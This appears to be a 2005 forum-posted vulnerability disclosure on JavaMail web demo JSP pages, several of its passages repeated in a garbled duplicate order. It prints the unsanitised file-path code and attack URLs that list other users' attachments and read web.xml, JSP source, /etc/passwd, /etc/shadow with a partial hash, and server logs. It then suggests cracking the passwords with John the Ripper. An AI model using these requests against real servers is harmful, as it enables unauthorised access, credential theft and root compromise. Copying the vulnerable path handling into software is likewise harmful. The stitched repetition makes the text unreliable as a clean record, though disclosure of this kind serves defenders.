It will give attacker any file on system, because it said getFilePath() + "/" + abc.getFileName()
1. Open specific mailbox attachment
2. Download .jsp source code and configuration information of javamail
3. Target machine Root/Admin Compromise
4. Download server information
1. Open specific mailbox attachment
When user download message from Javamail domain from webmail, attacker may notice URL
http://example.com/docdownloadfile.jsp?f=/var/serviceprovider/web/mailbo
xesdir/user (at) example (dot) com [email concealed]/messageid123@user/filename.extension
Then noticed URL lead to /var/folders so tried to switched folders.
http://example.com/var/serviceprovider/web/mailboxesdir/user (at) example (dot) com [email concealed]
/messageid123@user
But got errors. So finally when reached to this URL
http://example.com/mailboxesdir/user (at) example (dot) com [email concealed]/
It?s made listing of user (at) example (dot) com [email concealed] attachments are there.
Even unauthorized users are able to view specific mailbox attachment. Attacker need to know only username in order to get attachments listing.
http://example.com/mailboxesdir/user2 (at) example (dot) com [email concealed]/
http://example.com/mailboxesdir/user3 (at) example (dot) com [email concealed]/
2. Download configuration information of javamail
And noticed that docdownloadfile.jsp redirect to where the file are located on server with the Parameter f. actually web browser got the redirect name
In UNIX /etc/passwd and /etc/shadow are important folder which
A little bit curious and look in web browser typing that
http://example.com/Download?/etc/passwd
example of such a password file is:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
Then Crack Unix password files with John the Ripper.
John can be found practically anywhere. For example: try going to altavista.com and running a search for 'john the ripper'.
When attacker get information of root/admin user of target server and then attacker can lead to any attack. Attacker may do Website defacement, database altering, stealing and more.
4. Download server information
http://example.com/Download?/var/log/boot.log
http://example.com/Download?/var/log/maillog
And more can be done?.
By
Thet Aung Min Latt thetaung (at) gmail (dot) com [email concealed]
http://thetaung.amyanmar.com
Javamail Multiple Information Disclosure Vulnerabilities
May 25, 2005 Yangon, Myanmar.
Vulnerable Systems:
* JavaMail API 1.3
* JavaMail API 1.2
* JavaMail API 1.1.3
Tested on Apache Tomcat/5.0.16
Possibly on all versions of Windows
Failed to restrict to accessing other directory and files in ReadMessage.jsp
File Name:<%=mp.getFileName()%><br>
Type: <%=abc.getContent_Type()%><br>
Size: <%=abc.getMsgSize()/1024%>Kb<br><a href="docdownloadfile.jsp?f=<%=abc.getFilePath() + "/" + abc.getFileName() %>" target="_new"> download </a><br>
<%=abc.getFilePath() + "/" + abc.getFileName() %>"
It will give attacker any file on system, because it said getFilePath() + "/" + abc.getFileName()
1. Open specific mailbox attachment
2. Download .jsp source code and configuration information of javamail
3. Target machine Root/Admin Compromise
4. Download server information
1. Open specific mailbox attachment
When user download message from Javamail domain from webmail, attacker may notice URL
http://example.com/docdownloadfile.jsp?f=/var/serviceprovider/web/mailbo
xesdir/user (at) example (dot) com [email concealed]/messageid123@user/filename.extension
Then noticed URL lead to /var/folders so tried to switched folders.
http://example.com/var/serviceprovider/web/mailboxesdir/user (at) example (dot) com [email concealed]
/messageid123@user
But got errors. So finally when reached to this URL
http://example.com/mailboxesdir/user (at) example (dot) com [email concealed]/
It?s made listing of user (at) example (dot) com [email concealed] attachments are there.
Even unauthorized users are able to view specific mailbox attachment. Attacker need to know only username in order to get attachments listing.
http://example.com/mailboxesdir/user2 (at) example (dot) com [email concealed]/
http://example.com/mailboxesdir/user3 (at) example (dot) com [email concealed]/
2. Download configuration information of javamail
And noticed that docdownloadfile.jsp redirect to where the file are located on server with the Parameter f. actually web browser got the redirect name
http://example.com/Download?/var/serviceprovider/web/mailboxesdir/user@e
xample.com/messageid123@user/filename.extension
This information lead to get web.xml
http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml
Which give configuration information of javamail
Download source code of jsp file
http://example.com/Download?/var/serviceprovider/web/login.jsp
http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp
http://example.com/Download?/var/serviceprovider/web/addbook.jsp
http://example.com/Download?/var/serviceprovider/web/compose.jsp
http://example.com/Download?/var/serviceprovider/web/folder.jsp
3. Target machine Root/Admin Compromise
In UNIX /etc/passwd and /etc/shadow are important folder which
A little bit curious and look in web browser typing that
http://example.com/Download?/etc/passwd
example of such a password file is:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
Then Crack Unix password files with John the Ripper.
John can be found practically anywhere. For example: try going to altavista.com and running a search for 'john the ripper'.
http://example.com/Download?/etc/shadow
root:$1$ $WLzQjSmuxB/:133334:0:22222:7:::
adm:*:133334:0:22222:7:::
ftp:*:133334:0:2222:7:::
http://example.com/Download?/etc/group
/etc/group file:
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:lp
mail:x:8:
news:x:9:
uucp:x:10:
proxy:x:13:
When attacker get information of root/admin user of target server and then attacker can lead to any attack. Attacker may do Website defacement, database altering, stealing and more.
4. Download server information
http://example.com/Download?/var/log/boot.log
http://example.com/Download?/var/log/maillog
And more can be done?.
By
Thet Aung Min Latt thetaung (at) gmail (dot) com [email concealed]
http://thetaung.amyanmar.com
[ reply ]